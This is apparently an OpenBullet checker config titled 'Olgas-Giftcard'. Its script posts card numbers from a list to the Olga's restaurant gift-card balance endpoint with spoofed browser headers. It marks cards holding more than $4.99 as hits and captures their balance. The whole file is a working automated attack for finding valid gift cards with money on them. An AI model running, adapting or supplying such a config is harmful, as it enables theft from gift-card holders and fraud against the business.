[SETTINGS]
{
  "Name": "Olgas-Giftcard",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2019-07-20T09:23:42.240354+02:00",
  "AdditionalInfo": "",
  "Author": "",
  "Version": "1.2.6.5 [Paradox Mod]",
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST POST "https://www.olgas.com/getGiftCardBalance.php" 
  CONTENT "cardNumber=<CODE>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "Origin: https://www.olgas.com" 
  HEADER "Referer: https://www.olgas.com/gift-cards/" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "<SOURCE>" GreaterThan "$4.99" 
  KEYCHAIN Failure OR 
    KEY "$0.00" 

PARSE "<SOURCE>" LR "" "" CreateEmpty=FALSE -> CAP "Value" 

